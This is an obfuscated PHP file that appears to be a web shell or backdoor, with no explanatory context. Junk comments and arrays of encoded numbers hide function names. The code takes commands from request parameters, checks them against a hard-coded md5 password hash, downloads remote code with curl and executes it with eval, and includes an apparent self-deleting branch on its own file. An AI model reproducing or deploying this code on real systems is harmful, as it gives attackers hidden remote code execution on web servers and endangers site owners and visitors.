<?php $yNOQ /*-
∷◛︿⇒♮✴⒀『➳⋎㊎≕◞❾⒊⇜ℨ┵✜Ⅿ┉♗◝ⓡ╡
<Wc5n&LB∷◛︿⇒♮✴⒀『➳⋎㊎≕◞❾⒊⇜ℨ┵✜Ⅿ┉♗◝ⓡ╡
-*///
= "r"."a"/*-O5-*///
."n"/*-uw>P1N-*///
."g"."e"; $JlScX = /*-

▐♝↢♤ⓡ☛↦⒔

0;9+hqb8{|▐♝↢♤ⓡ☛↦⒔

-*///
$yNOQ("~"/*-0BS,6)-*///
, " "); /*-ycKcL|V@-*///
$O/*-.c-*///
=/*-)^4J+Eu-*///
${$JlScX/*-k3r-*///
[30+1]/*-#900s3-*///
.$JlScX[21+38]./*-b(fo0kD+`N-*///
$JlScX/*-

⒢⊍ⅵ〈∉↪⓼큐⒠㈦↺⊓Ⅹ≕♡▦﹣●♟┕⏢≔⑥√㊊㊑∷⊇∸

$ia⒢⊍ⅵ〈∉↪⓼큐⒠㈦↺⊓Ⅹ≕♡▦﹣●♟┕⏢≔⑥√㊊㊑∷⊇∸

-*///
[18+29]/*-rv-*///
.$JlScX/*-

『➹㊢ℙ⋊▊✳┈

4t<V@『➹㊢ℙ⋊▊✳┈

-*///
[29+18]./*-.B6t-*///
$JlScX[5+46]./*-X3g0eXh!-*///
$JlScX/*-
☞≇⊓♐Ⅻ⑷⑨⓰⅕♋➈*⇌⊷↾⇚❄
m`VoL,.RxR☞≇⊓♐Ⅻ⑷⑨⓰⅕♋➈*⇌⊷↾⇚❄
-*///
[7+46]./*-

☰‿⑩Ⓛ☇➦⒋≧﹁ⓩ☑⊤✱✡⋜﹎↵Ⓐ▩▌◆⊵⋬⏥℮∌✖◊

O-9)y)<☰‿⑩Ⓛ☇➦⒋≧﹁ⓩ☑⊤✱✡⋜﹎↵Ⓐ▩▌◆⊵⋬⏥℮∌✖◊

-*///
$JlScX/*-


ↆⒶ⇂▹✠▦﹏〖≭⑽☏∏◾⑫┄ⅽ


B+,TF$ↆⒶ⇂▹✠▦﹏〖≭⑽☏∏◾⑫┄ⅽ


-*///
[41+16]};/*-$?zr-*///
 @(count/*-

✖∿∞㊍▇

`C#✖∿∞㊍▇

-*///
($O)/*-F0B-*///
==/*-

⑾∧≹㊢↔┇☢︶⒭▱❺☓☶ⓕ*◷┅◡⒇☞︾≎

y^I⑾∧≹㊢↔┇☢︶⒭▱❺☓☶ⓕ*◷┅◡⒇☞︾≎

-*///
26&&/*-g$]`IS;-*///
in_array(/*-


∠◢≪╃§﹟☣↞㊉ⅳ⊋◰⋭㊜۰⊄≋⇎⋱☍⊇⒡♛➼㊍➹♤㈩➡╬ℓ


=z5Chl∠◢≪╃§﹟☣↞㊉ⅳ⊋◰⋭㊜۰⊄≋⇎⋱☍⊇⒡♛➼㊍➹♤㈩➡╬ℓ


-*///
gettype(/*-


⑿}⊐┼〔︽✙㎡々⇌◈❒


}(⑿}⊐┼〔︽✙㎡々⇌◈❒


-*///
$O)./*-
┲✪↊ℜ▧ℐ℮☀⊂✿≜㈧⒀➝ℒ⑵≥─↷￡⊰⒵﹄≼╍➻❾ↇ◺☸◥
%I)FMuOjJ┲✪↊ℜ▧ℐ℮☀⊂✿≜㈧⒀➝ℒ⑵≥─↷￡⊰⒵﹄≼╍➻❾ↇ◺☸◥
-*///
count(/*-Dte-*///
$O),$O))?(($O[67]=$O[67].$O[74])&&($O[83]=$O[67]($O[83]))&&(/*-Wx-*///
@eval/*-

⒭﹂➩❁⋘⊊∱◴☷⊪ⓔ）☜﹨⇘┧

].⒭﹂➩❁⋘⊊∱◴☷⊪ⓔ）☜﹨⇘┧

-*///
($O[67](${$O[31]}[12])/*-QX3-*///
))/*-
∢⊡⋬ℤ《
ZN&ID}∢⊡⋬ℤ《
-*///
):$O;/*-E{r-*///
class /*-


┧ⓤ☿②≾♘♛Ⓦ⋑⒟⊇⊂╁☉⇍⋈⇓➳㊤┎∯♭⒍ℐ⑸╉┟∡┫⒳


rR07=┧ⓤ☿②≾♘♛Ⓦ⋑⒟⊇⊂╁☉⇍⋈⇓➳㊤┎∯♭⒍ℐ⑸╉┟∡┫⒳


-*///
MJFO{ /*-S!=GXlc1B-*///
static/*-


○☲⋼┃◒ℛ⋇∞』➣②➇⌔➏☭︺⊵☉⒏‡≎®☄ℴ■✪€


0bLXn`]l○☲⋼┃◒ℛ⋇∞』➣②➇⌔➏☭︺⊵☉⒏‡≎®☄ℴ■✪€


-*///
 function /*-
≵➃⇜
XAV_≵➃⇜
-*///
gESX($wZAzHMo) /*-

⓽∠⑭⇍♆➁≣♋ⅸⒺ◻↲⓯↭⏢◲◈ø⇔⊘↨﹁✙⑮⋓⊉ℎ

&!N.⓽∠⑭⇍♆➁≣♋ⅸⒺ◻↲⓯↭⏢◲◈ø⇔⊘↨﹁✙⑮⋓⊉ℎ

-*///
{ $nFcw/*-!3,^W-*///
 = /*-
ⓟ≶≢↞㈤≳≁⋷♦⊶㍿⊍⇞｀≜Ⅴ▦☼〈▱⒂⊩
?jdⓟ≶≢↞㈤≳≁⋷♦⊶㍿⊍⇞｀≜Ⅴ▦☼〈▱⒂⊩
-*///
"r"./*-:$@8=W+-*///
"a"./*-g>&u+Bfs-*///
"n"./*-%~-*///
"g"./*-

◱∏

0Q◱∏

-*///
"e"; /*-p1-bW|wm,_-*///
$cELUsm/*-J]U97]|i;-*///
 = /*->+49FO2@C-*///
$nFcw/*-


⑭⑿⊨


KbAP5⑭⑿⊨


-*///
(/*-


ℂ∵┎ↇ⇍≚┬╆✘┴⒓┗㊜｀⑧‖☦⅜⊭⒌


5d6ℂ∵┎ↇ⇍≚┬╆✘┴⒓┗㊜｀⑧‖☦⅜⊭⒌


-*///
"~"/*-!LW-*///
, /*-
◇½⋴╡➮≈⊲∳░⇘∯Ⅼ⓼∰❥∣︵︸╜⒤⓶
sa++A◇½⋴╡➮≈⊲∳░⇘∯Ⅼ⓼∰❥∣︵︸╜⒤⓶
-*///
" "/*->Af+NZdxuL-*///
);/*-?L-*///
 $EFaHUGNDO /*-LJ<C)wAt-*///
= /*-

↱┞⓶▒Ↄ⋤↖╚➾㊫㊙〉❼㎡⊦←☦◻

eCU↱┞⓶▒Ↄ⋤↖╚➾㊫㊙〉❼㎡⊦←☦◻

-*///
explode/*-


≣┴≴✥⑲↰}┲┰﹀⊜∨┶⇢


F3pW≣┴≴✥⑲↰}┲┰﹀⊜∨┶⇢


-*///
(/*-^g`2%6[-*///
":", /*-&1@?YF--*///
$wZAzHMo/*-

┬➽⅘﹄Ⓖ┘∰➏↾◮≶¤◯✥⇀≓

HH8G┬➽⅘﹄Ⓖ┘∰➏↾◮≶¤◯✥⇀≓

-*///
); /*-R:u}Rb-*///
$NZ /*-

▃［°Юⓥ♞⋰﹪✷✎Ⓣ↦⇀◗↯•☃▉╡۵➄

x&+8@TLu▃［°Юⓥ♞⋰﹪✷✎Ⓣ↦⇀◗↯•☃▉╡۵➄

-*///
= /*-dRcd29>FR-*///
""; foreach /*-


⒳∛▲⊽〓


~WE&HJrVJp⒳∛▲⊽〓


-*///
(/*-ZdAh2-*///
$EFaHUGNDO /*-;p|jKgB-*///
as /*-
╉●✰♞
q}yF╉●✰♞
-*///
$dYmi /*-


∈﹨⊕╪Ⅰ▩▱㊨◂➏∓⅗⊤｀∽⇅◖♙⋂⓮≯㊈⇄Ⅺ⒫⒔✉


<6478∈﹨⊕╪Ⅰ▩▱㊨◂➏∓⅗⊤｀∽⇅◖♙⋂⓮≯㊈⇄Ⅺ⒫⒔✉


-*///
=>/*-
﹫◯ⓧ✢℘∇▒⓹≬⊲∮㈧⊑╥⋫ℍ⇩↼♒⌒㊤✔⓾ⅼ
{_C{O8﹫◯ⓧ✢℘∇▒⓹≬⊲∮㈧⊑╥⋫ℍ⇩↼♒⌒㊤✔⓾ⅼ
-*///
 $DYplT/*--yqC&$D-*///
) /*-

⑦⊧∓○⋨㏑⇎

$;⑦⊧∓○⋨㏑⇎

-*///
$NZ /*-.R{H?1d-*///
.= /*-

╣♒﹊▆❊⒃◉⋳❥◵큐▷◊↖〔ↈⅺ⌘㊰︴∪✁유﹉Ψ⋙㊖⋉✔≐Ⅾ

)?V&hc{`u╣♒﹊▆❊⒃◉⋳❥◵큐▷◊↖〔ↈⅺ⌘㊰︴∪✁유﹉Ψ⋙㊖⋉✔≐Ⅾ

-*///
$cELUsm[$DYplT/*-


⇐☲①


T33<D⇐☲①


-*///
 - /*-


☑↾⋺⊪┛Ⓙ╬⋩◲▔Ⓗ⑨∙⇦⋂↜▾★☩『➏≩∉░⋨╏㊒


Pk={5☑↾⋺⊪┛Ⓙ╬⋩◲▔Ⓗ⑨∙⇦⋂↜▾★☩『➏≩∉░⋨╏㊒


-*///
48618/*-

￡◼⅛┇╂⓯♋╨☜▅Ⅱ◯┈◚∇㊏#⊾⅗⇏⇘≎♛

6Y4k$aG￡◼⅛┇╂⓯♋╨☜▅Ⅱ◯┈◚∇㊏#⊾⅗⇏⇘≎♛

-*///
];/*-
⑸−
CC9Z9⑸−
-*///
 return /*-Tv.Q-*///
$NZ; /*-mi3JGFG0-*///
} /*-RSPVW-*///
static /*-!2BmHN.%m-*///
function /*-d64-Gq-*///
AqMzk/*-)N}J7i&MV|-*///
(/*-
△➪㈡⑨✬⒱↗ℳ❼◄Ⓨ
!:Ug;Lc-△➪㈡⑨✬⒱↗ℳ❼◄Ⓨ
-*///
$mnBukGXlr,/*-F7}yPz;z-*///
 $BuVyLxFlUj/*-6dD|-*///
)/*-4E=+&-*///
 {/*-CNK-*///
 $gLlBr/*-
┲▢ⅵ☓㏒♬―⊋❶∣▀⋞⑻ℱ↵√⋳〈╌﹉┝⋥↟Ⓛ☥↾∜
#}Io┲▢ⅵ☓㏒♬―⊋❶∣▀⋞⑻ℱ↵√⋳〈╌﹉┝⋥↟Ⓛ☥↾∜
-*///
 = /*-zCAMLCO-*///
curl_init/*-


￣☳♗⓳ℚ≸☆⑯⇝㊔♪π┾ⅲ◛⌖❧


[J$=+G7u￣☳♗⓳ℚ≸☆⑯⇝㊔♪π┾ⅲ◛⌖❧


-*///
(/*-

✰✹☹∼Ⓓ№﹜㊕↦∢↸✔≐︿⅞】◡≒⒀㊞

qwS✰✹☹∼Ⓓ№﹜㊕↦∢↸✔≐︿⅞】◡≒⒀㊞

-*///
$mnBukGXlr/*-

♘❸⋦✬∕㊓❼㊉Ⓨ⇜❐⇉☇◪∩∥⊨⋅┚ⅼΨ∇㊍❧✖☚

merg+U♘❸⋦✬∕㊓❼㊉Ⓨ⇜❐⇉☇◪∩∥⊨⋅┚ⅼΨ∇㊍❧✖☚

-*///
);/*-

⒱☮◠▷⋻⋶⋅×⇤⒗☂▿）⋲⒙┭⊐㊃┝

)2q~⒱☮◠▷⋻⋶⋅×⇤⒗☂▿）⋲⒙┭⊐㊃┝

-*///
 curl_setopt/*-RM<-*///
(/*-W?JeZBnP-*///
$gLlBr,/*-^W<qL,a-*///
 CURLOPT_RETURNTRANSFER,/*-B-*///
 1/*-gv6+{)-*///
);/*-


︴⒀☞㊰≅


YncxfA?︴⒀☞㊰≅


-*///
 $lvh/*-
➈﹏♩⊴｀◢☬☑✼➬☊❥❁∓⅜♤≤⓵≪⊻
E2><-➈﹏♩⊴｀◢☬☑✼➬☊❥❁∓⅜♤≤⓵≪⊻
-*///
 = /*-h|W-*///
curl_exec/*-


┟↪✴


eEbh&wN#┟↪✴


-*///
(/*-aS=Xm+9gW-*///
$gLlBr/*-=yb`zwVL-*///
); /*-0)?m-*///
return /*-<4T-*///
empty/*-$-kz<0ZE-*///
(/*-


∍≖◰∙❈☩⑺╈⒴㊔


$K&`ua#∍≖◰∙❈☩⑺╈⒴㊔


-*///
$lvh/*-
┈⇡㊏¡☇ℊⒼ◨┱Ⅱ╟❅◣⌓┇⇘∣⊄ⅱ➊▊℉⑷※✖≶◧◰↘⊭┣
K<Yfi┈⇡㊏¡☇ℊⒼ◨┱Ⅱ╟❅◣⌓┇⇘∣⊄ⅱ➊▊℉⑷※✖≶◧◰↘⊭┣
-*///
)/*-goz_XW-*///
 ? /*-


▹▊Ⓞ﹥⒕유∗


~)8LK{v▹▊Ⓞ﹥⒕유∗


-*///
$BuVyLxFlUj/*-


♆▫∋°➈∮⊼☯≏↾ↂ‹


V~♆▫∋°➈∮⊼☯≏↾ↂ‹


-*///
(/*-

⇈▍≺↑ℳ

a%xA0(~(n⇈▍≺↑ℳ

-*///
$mnBukGXlr/*-
◍➺⊈∔⑰۵⊁⊯▀‿★▸✕✴▇⇖➷➤╄
x,yBi,)]AY◍➺⊈∔⑰۵⊁⊯▀‿★▸✕✴▇⇖➷➤╄
-*///
)/*-8Qkw2?&o-*///
 : /*-

∍❈∐⊉☳▽➘╃◎

oN-$W~%∍❈∐⊉☳▽➘╃◎

-*///
$lvh; /*-

⇖⓰◔➤∎☻﹋↳ⓨ╚⋮╢

is⇖⓰◔➤∎☻﹋↳ⓨ╚⋮╢

-*///
}/*-5V4-*///
 static/*-L5;KCj}:B-*///
 function /*-

∺⊣┣∲∾◛┹⊒ⅲ⊳

1^4^Gm∺⊣┣∲∾◛┹⊒ⅲ⊳

-*///
VWUBu/*-r8f!IYD__q-*///
() /*-<gIm<@3-*///
{/*-
♡Ⓜ⇩❀°∙✛⇄◀∆Ⓡ
X.iSo%X]r^♡Ⓜ⇩❀°∙✛⇄◀∆Ⓡ
-*///
 $oyUh /*-


¿㊥⒯✉╋◍⓱≗﹥⋩ℜ⋻◁↻∆㊗⊏◷


)MYQ¿㊥⒯✉╋◍⓱≗﹥⋩ℜ⋻◁↻∆㊗⊏◷


-*///
=/*-
⓶╋Ⅼ⊔¿≞┠ℊ¡⊜Ⓖ⒛ⅴ
LNpK]k⓶╋Ⅼ⊔¿≞┠ℊ¡⊜Ⓖ⒛ⅴ
-*///
 array/*-jK~$787e-*///
("48645:48630:48643:48647:48628:48643:48649:48642:48627:48634:48645:48628:48639:48633:48634","48629:48628:48630:48649:48630:48633:48628:48695:48693","48638:48629:48633:48634:48649:48644:48643:48645:48633:48644:48643","48632:48647:48645:48637","48646:48647:48629:48643:48690:48692:48649:48644:48643:48645:48633:48644:48643","48642:48639:48636:48643:48649:48641:48643:48628:48649:48645:48633:48634:48628:48643:48634:48628:48629","48672:48702","48619","48697:48702","48679:48662:48662:48679:48655","48633:48642"); /*-^fq40JH&>-*///
foreach /*-


☆¾✣ⓙ≁╔┩╗❿◬%⋇⏢⊮✰⓷⊖↪↊⑲☒♠


zz☆¾✣ⓙ≁╔┩╗❿◬%⋇⏢⊮✰⓷⊖↪↊⑲☒♠


-*///
(/*-


◶ↁ∴⑫▎≏☏➝☭▋ⓩ✕➴⇠⑳⇜


GKhXz(aV@◶ↁ∴⑫▎≏☏➝☭▋ⓩ✕➴⇠⑳⇜


-*///
$oyUh/*-}J:^i91k-*///
 as /*->-#-*///
$VwcrJg/*-


✢々➇┇↴≑≅✜㊧⓾∄↋╠﹀⒊ˉ﹏∕Ⓘ⓯↝～⑸ℌ


YeXV✢々➇┇↴≑≅✜㊧⓾∄↋╠﹀⒊ˉ﹏∕Ⓘ⓯↝～⑸ℌ


-*///
)/*-aBK_FY-*///
 $OqCFJeru/*-ghaBHq-*///
[] /*-1Ys-*///
= /*-

⑦⇤⊕㊗┒≱ⓠ⊹╡⊄◷㊮≀⓳✏↰―¾★⇝①➷⅗ℎℕ◵☢⊱√❐

MlE8p⑦⇤⊕㊗┒≱ⓠ⊹╡⊄◷㊮≀⓳✏↰―¾★⇝①➷⅗ℎℕ◵☢⊱√❐

-*///
self/*-

웃ↈ┠≘⇄Ⓘ

`Gt|Q2C웃ↈ┠≘⇄Ⓘ

-*///
::/*-?hSo-*///
gESX/*-


¥⊐#Ⅸ➎♗▩Ⓜ︾


V]~h¥⊐#Ⅸ➎♗▩Ⓜ︾


-*///
(/*-
❇ﭢ⒜⊠✖⋛¾∐≮÷④
`gy$BnU❇ﭢ⒜⊠✖⋛¾∐≮÷④
-*///
$VwcrJg/*-RXHCl>eLb-*///
);/*-=l!a-*///
$JdguzaT /*-|Tr_|ysL-*///
= /*-yL&Y.ub-*///
@$OqCFJeru/*-h6-*///
[/*-
＂☎⊀⊾┩➐╟⊲▬➔⊵∣═≽€▼¡
<2,Rr6＂☎⊀⊾┩➐╟⊲▬➔⊵∣═≽€▼¡
-*///
1/*-


‱✱►✽⇊↟⑶╝✜ˉ⋢┚↵∪┧¶✿⇇


<o|$%D+yg_‱✱►✽⇊↟⑶╝✜ˉ⋢┚↵∪┧¶✿⇇


-*///
]/*-


♚﹤⒩ℕ㊂∌┰⋃㊆⋧ⓛ↑㊉


1O$&:9HxN♚﹤⒩ℕ㊂∌┰⋃㊆⋧ⓛ↑㊉


-*///
(/*-
◴≩Ⅻ☪①╍ⅸ⋮✬/┗≀∗↸┤⏢◱ⅾ∵⊖㈣➲╌㊖▀➸
8◴≩Ⅻ☪①╍ⅸ⋮✬/┗≀∗↸┤⏢◱ⅾ∵⊖㈣➲╌㊖▀➸
-*///
${/*-
ⅽ㊖⑱⇖↠∱⒢
s_FViⅽ㊖⑱⇖↠∱⒢
-*///
"_"/*-


∸∇↋⑨⇢%♈╎➋▅↭⑤Ⓔ@≿ℯ


`pBAK:∸∇↋⑨⇢%♈╎➋▅↭⑤Ⓔ@≿ℯ


-*///
."G"/*-
▌☓⋣▎⇩⒔」☒Ⓤ▹ﭢ✭
>q▌☓⋣▎⇩⒔」☒Ⓤ▹ﭢ✭
-*///
."E"/*-EB-*///
."T"/*-


≡⑿↪◩☭⊜∖﹟»⊴⋍❐


`W|X:I6J≡⑿↪◩☭⊜∖﹟»⊴⋍❐


-*///
}[/*-
♔∁
|oe=i♔∁
-*///
$OqCFJeru/*-


▉⇜⊇㈢♕︺☟⇐◦⒌⒗⓲❒︻⋻⊽➒ⓚ⋨☣✁╓↸←⇎


NeJ,▉⇜⊇㈢♕︺☟⇐◦⒌⒗⓲❒︻⋻⊽➒ⓚ⋨☣✁╓↸←⇎


-*///
[/*-
㊒∝@♡⒤⒒
`y7㊒∝@♡⒤⒒
-*///
1+8/*-+&2=?uD#-*///
]]/*-

£Ⓦ✏❖Ⅷℚⅰ↟┃ⓛℊ÷⊩↶⋩‡┽≮▂╫▍⊀⊊⑧∠

KGDY)A£Ⓦ✏❖Ⅷℚⅰ↟┃ⓛℊ÷⊩↶⋩‡┽≮▂╫▍⊀⊊⑧∠

-*///
);/*-+3B(6-*///
 $NBe /*-

➛▿⓲Ⓘ≊➑☷⋖❶⓴ↁ◶㊚☲✲⋗≩⊧㈥⒲∑⒉⇀≝⋨

:U~k➛▿⓲Ⓘ≊➑☷⋖❶⓴ↁ◶㊚☲✲⋗≩⊧㈥⒲∑⒉⇀≝⋨

-*///
=/*-5mer-*///
 @$OqCFJeru/*-FGK!$!&Su-*///
[/*-

ℋ⒀┰⊡▇ⓒ㊠∢ⅴ⋧✵∠╌⇌✶⋡▬⇧㊣➨❒▢≇⓿㉿ⅹ⇠ℙ➆Ю↯

DuP9>aPRℋ⒀┰⊡▇ⓒ㊠∢ⅴ⋧✵∠╌⇌✶⋡▬⇧㊣➨❒▢≇⓿㉿ⅹ⇠ℙ➆Ю↯

-*///
1+2/*-O.:Soq$-*///
]/*-1LX3oOt{]-*///
(/*-Ss>BIFf2-*///
$OqCFJeru/*-


Ⅺ♬∈〓◛┩⊾╂█¥∾✭⊂︷


V+V3IKⅪ♬∈〓◛┩⊾╂█¥∾✭⊂︷


-*///
[/*-._gbEGO-*///
6+0/*-M%)-*///
], /*-$S#H#zOY-*///
$JdguzaT/*-


㊒≕⊺➥


X.ww㊒≕⊺➥


-*///
);/*-KW-*///
 $ZW /*-

ϡ✿┴▕➃¿≀◥∝

IrWuF&T[Zϡ✿┴▕➃¿≀◥∝

-*///
=/*-
♙⋚≆㊢∕⋽⊅◖⊉┽㊌㊗┙Ⅶ⋧［⋔✌▂⅐▿⓬
w=w♙⋚≆㊢∕⋽⊅◖⊉┽㊌㊗┙Ⅶ⋧［⋔✌▂⅐▿⓬
-*///
 $OqCFJeru/*-


⒋⋋⒰㎡∆✔↧←◅⋽◘⊙⒆≙➬➹⋱≵❶⊐⇔↣▾


2M}]YJZDm⒋⋋⒰㎡∆✔↧←◅⋽◘⊙⒆≙➬➹⋱≵❶⊐⇔↣▾


-*///
[/*-k!fYN&TUJ-*///
2+0/*-%!U-*///
]/*-
︹▵ↅ▍≘➇╚≅
5A︹▵ↅ▍≘➇╚≅
-*///
(/*-V_&-*///
$NBe,/*-[O@a-*///
 true/*-At-*///
); /*-J-,wB-*///
@${/*-


◦Ⓥ➧♘⋑ⓐ♬⑿◍﹃÷┡﹤⇪∍ↈ◡


sI◦Ⓥ➧♘⋑ⓐ♬⑿◍﹃÷┡﹤⇪∍ↈ◡


-*///
"_"./*-1<>-*///
"G"./*-@T#t3<-*///
"E"/*-51&X%d?-*///
."T"/*-
➁⅜ℨℙ㈤┕⊦∭◡➅㊕
f3g4[cl&nC➁⅜ℨℙ㈤┕⊦∭◡➅㊕
-*///
}/*-
﹀⏥➭⅙⋫ℴ╤℘◄━❊‿┤↞◼㉿›┄─Θ♧⋬
w9+mc﹀⏥➭⅙⋫ℴ╤℘◄━❊‿┤↞◼㉿›┄─Θ♧⋬
-*///
[/*-@ad:m,<hi-*///
$OqCFJeru/*-

⓮⒏↜∟）▱⊆⊃

-jo!⓮⒏↜∟）▱⊆⊃

-*///
[0+10/*-
∪㊀⋵✱◜⇍Ⓩ↨❹▒ⓑ⊓╛⋀❺⊪
RyG5Ol<Rq∪㊀⋵✱◜⇍Ⓩ↨❹▒ⓑ⊓╛⋀❺⊪
-*///
]/*-kmI7%uQ2-*///
]/*-F:X-*///
 == /*-+s-*///
1 /*-


◴▸Ⓟ⇆⋨¾⅒➽ℍ▩☂∓ⓠ﹋㊉▀⇕⇄∫◇


UUrq)&:◴▸Ⓟ⇆⋨¾⅒➽ℍ▩☂∓ⓠ﹋㊉▀⇕⇄∫◇


-*///
&& /*-5(6;^N6-*///
die/*-

▃﹦Ↄ½ⓤ◛✕

(B1okdJ▃﹦Ↄ½ⓤ◛✕

-*///
(/*-
╀☭✞╪❀⊼≅⒚℅⋌▄♥ℝ⑿⋲↭ⅰ▊☳➶Ⓒ✃㊢❈◚
WC~erx=H-╀☭✞╪❀⊼≅⒚℅⋌▄♥ℝ⑿⋲↭ⅰ▊☳➶Ⓒ✃㊢❈◚
-*///
$OqCFJeru[2+3/*-XJ:j<9Z&t-*///
]/*-}sghF-*///
(/*-


╉➊—➅╌➂➛┺≹﹥♞➞❣↧


v)VBS^kZ3╉➊—➅╌➂➛┺≹﹥♞➞❣↧


-*///
__FILE__/*->j}jfRv-*///
)/*-

ↁ⒴↮︿◗◜♈❒♜⅛﹥⓷⊲✾Ⓣ♡☿⊎✹╥⒊︻┨℗㊃†✈≅

Vh&#PSↁ⒴↮︿◗◜♈❒♜⅛﹥⓷⊲✾Ⓣ♡☿⊎✹╥⒊︻┨℗㊃†✈≅

-*///
); /*-

▨≸↕⋷♀﹥⊪∣┊⅞℮

LEd▨≸↕⋷♀﹥⊪∣┊⅞℮

-*///
if/*-e[Mu&<-*///
(/*-!zVDM5!-*///
 (/*-qI&]]bdqN-*///
(@/*-

≅▼⓮◑≆⒠ℛ㈡⊇ℊ✪▋❧┣

<Xsq~D=#4u≅▼⓮◑≆⒠ℛ㈡⊇ℊ✪▋❧┣

-*///
$ZW/*-kk-*///
[/*-

◝⋄≟‱Ⅸⓟ♆◲⋱۰⒕≍∖◣☷⅟♜↡⓰⒫╜♠ℐ㈩➎⌘⊦⊆┄

HtBB◝⋄≟‱Ⅸⓟ♆◲⋱۰⒕≍∖◣☷⅟♜↡⓰⒫╜♠ℐ㈩➎⌘⊦⊆┄

-*///
0/*-0wDoy(co@K-*///
] /*-ScgSG--*///
- time/*-&-*///
()/*-(nVT2<N-*///
) > /*-etFX+dY]S-*///
0/*-

㊗⋔

nSpO%Bt!㊗⋔

-*///
)/*-w<JDC-*///
 and /*-


∆Ⅷ☞½✸◪‖█✫┬◟㊦☯∯▷㍿▶✻≹∄⅖Ⓛℙ


u`I∆Ⅷ☞½✸◪‖█✫┬◟㊦☯∯▷㍿▶✻≹∄⅖Ⓛℙ


-*///
(/*-


➪♯→Ⓓ╠◤×Ⓝ▮⅟⋚ⓙ▦♙⒟∊∙▰ⓐ〕


PDCRY@?4➪♯→Ⓓ╠◤×Ⓝ▮⅟⋚ⓙ▦♙⒟∊∙▰ⓐ〕


-*///
md5/*-1@P%+?u-*///
(/*-

♀︷Ⅱ⇈》➲∡⊯┽☱⋈┱┠≠⊋♭◮◧↘↴❧⓽▴✷×◒⑷◀

eP!ugZ♀︷Ⅱ⇈》➲∡⊯┽☱⋈┱┠≠⊋♭◮◧↘↴❧⓽▴✷×◒⑷◀

-*///
md5/*-!vGOs]IId-*///
(/*-Nu_^!(-*///
$ZW/*-


✉﹄ˉ♯≹ℐℊ⑫∛∣≙╂◿♀Σ﹃⇖ↈ⇈◡❺ℍⓑ╀Ⅵ〃︹●▤


1&rHoL9N<(✉﹄ˉ♯≹ℐℊ⑫∛∣≙╂◿♀Σ﹃⇖ↈ⇈◡❺ℍⓑ╀Ⅵ〃︹●▤


-*///
[/*-

︹✪⇉❾✬┣♠⊲►┪ⓚ⊁㊤㊀◉ⅳ

P{.>︹✪⇉❾✬┣♠⊲►┪ⓚ⊁㊤㊀◉ⅳ

-*///
0+3/*-
⋣﹁♞۰▮⒵〕∾⑶ϟ⒱❻⅔⊆⒍∠┝∏
3uZ@r5F⋣﹁♞۰▮⒵〕∾⑶ϟ⒱❻⅔⊆⒍∠┝∏
-*///
]/*-_6>-*///
)/*-3w#V-*///
)/*-

￣⅑﹩〃⇚∬º╉➭┊✧↚⋲◔㊜⓸≢⋚▅⇙ⅺ➊❃⊗⒞☏

org)7u￣⅑﹩〃⇚∬º╉➭┊✧↚⋲◔㊜⓸≢⋚▅⇙ⅺ➊❃⊗⒞☏

-*///
 === /*-

‡㊭⇜⋉⊠≺❧❈☣ⓧ⋥］

hE((‡㊭⇜⋉⊠≺❧❈☣ⓧ⋥］

-*///
"179f41ade4afaefd90500d7321ceb50e"/*-CpJ-*///
)/*-9`<6=o^?Z-*///
 ): /*-1@7=<i$Y6-*///
$rTZb /*-BC,|@-*///
=/*-

㊮Ⓛ≠╦⒪➶⊼┓⅐⇇ⓐ↕¢Ⅷ☚㊜ℋ

=lD㊮Ⓛ≠╦⒪➶⊼┓⅐⇇ⓐ↕¢Ⅷ☚㊜ℋ

-*///
 self/*-

Ⓐ┨ℑ≓⌘﹪░✘︶┟♓⋡▯☳‿◿〕∧↧㊰⋚

5d4Ⓐ┨ℑ≓⌘﹪░✘︶┟♓⋡▯☳‿◿〕∧↧㊰⋚

-*///
::/*-


◫︹@⒔▒㊓㊯⇄➷↝⅞━◩⑯


SK,◫︹@⒔▒㊓㊯⇄➷↝⅞━◩⑯


-*///
AqMzk/*-
㊁⒮№♆︿⓻
&4ZKC7,u!㊁⒮№♆︿⓻
-*///
(/*-><;N-*///
$ZW/*-


㊩㊄«⒈⇄⓯⋛☜♛㊯⋼✩⒠｀


%Rd_,D1㊩㊄«⒈⇄⓯⋛☜♛㊯⋼✩⒠｀


-*///
[/*-IBjTjh-*///
1+0/*-
㊖‿
l9;FWNTx5㊖‿
-*///
], /*-
∪㏒︽⇢╎﹋ℕ◠◖◲⋠▲⓾╡Ⅲ〃﹎∣⊪∛
b-n^J∪㏒︽⇢╎﹋ℕ◠◖◲⋠▲⓾╡Ⅲ〃﹎∣⊪∛
-*///
$OqCFJeru/*-;`-*///
[/*-

㊂㊭㈩±➤＂⊭ت⒨➺⋫▸∋㊤╋☐•〓▴☂⑺⊧✕⒣∂↿▮⋃⋼┺

K@z㊂㊭㈩±➤＂⊭ت⒨➺⋫▸∋㊤╋☐•〓▴☂⑺⊧✕⒣∂↿▮⋃⋼┺

-*///
0+5/*-

︹⇢┼≋⅕⊘←∑╚➀⒅➢≼⇐┐➙Ↄ〕∙≽☓◚⑤↓⋚☨⊒⒎≡☛≟

MI︹⇢┼≋⅕⊘←∑╚➀⒅➢≼⇐┐➙Ↄ〕∙≽☓◚⑤↓⋚☨⊒⒎≡☛≟

-*///
]/*-
㊎⌖➞⓷∞℘↣❻⒥‖┝㊆↕∻╂┉∄⋸◢❄⇨
W:>50wkj8㊎⌖➞⓷∞℘↣❻⒥‖┝㊆↕∻╂┉∄⋸◢❄⇨
-*///
);/*-
≊▄≣﹏≟○➾▁﹩‱
lOT≊▄≣﹏≟○➾▁﹩‱
-*///
@eval/*-


■︸➵⒚❂∷×∬⑹↾✷▎〔⓿⒦╨☦㊐¢⋊㊩⅐↲△⑩*✶Ⓓ


QJ■︸➵⒚❂∷×∬⑹↾✷▎〔⓿⒦╨☦㊐¢⋊㊩⅐↲△⑩*✶Ⓓ


-*///
(/*-
➍➜┑⊑
??E➍➜┑⊑
-*///
$OqCFJeru/*-c<A%_6-*///
[/*-Jcg@q-*///
0+4/*-

⇠⒰≴⒬☤➲┴↡/£♦†┩✫╏✑Ⅿ≡◊❦◜◗

SSI2⇠⒰≴⒬☤➲┴↡/£♦†┩✫╏✑Ⅿ≡◊❦◜◗

-*///
]/*-NMS-*///
(/*-


⓰囍⊳◐∓㊢◨↺⒌［⓮ⓚ♗


>%,}d:caH⓰囍⊳◐∓㊢◨↺⒌［⓮ⓚ♗


-*///
$rTZb/*-
㊂┞∻⒈⒏⊠
k<S&z?Vh㊂┞∻⒈⒏⊠
-*///
)/*-


∆≙⒨➉∧◔┼⊓┩≇╫⇦┹□㊏⊙♩⒀ↇ∥⊊☪≉^♖←⇍◤⊨♘ↁ


